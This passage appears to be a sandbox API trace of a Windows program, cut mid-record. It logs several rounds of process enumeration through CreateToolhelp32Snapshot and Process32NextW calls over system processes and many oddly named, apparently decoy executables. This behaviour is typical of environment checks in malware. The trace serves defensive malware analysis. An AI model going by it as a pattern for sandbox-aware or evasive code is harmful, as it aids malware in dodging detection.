th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.626] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.627] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.628] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.629] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0142.631] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0142.632] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0142.633] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0142.634] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0142.635] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0142.637] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0142.638] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0142.640] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0142.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0142.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0142.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0142.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0142.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0142.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0142.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0142.649] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0142.650] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0142.651] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0142.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0142.654] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0142.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0142.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0142.708] CloseHandle (hObject=0xbc) returned 1 [0142.708] Sleep (dwMilliseconds=0x12c) [0143.061] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.066] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, 
th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.095] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: 
lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0143.160] CloseHandle (hObject=0xc4) returned 1 [0143.160] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0143.165] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, 
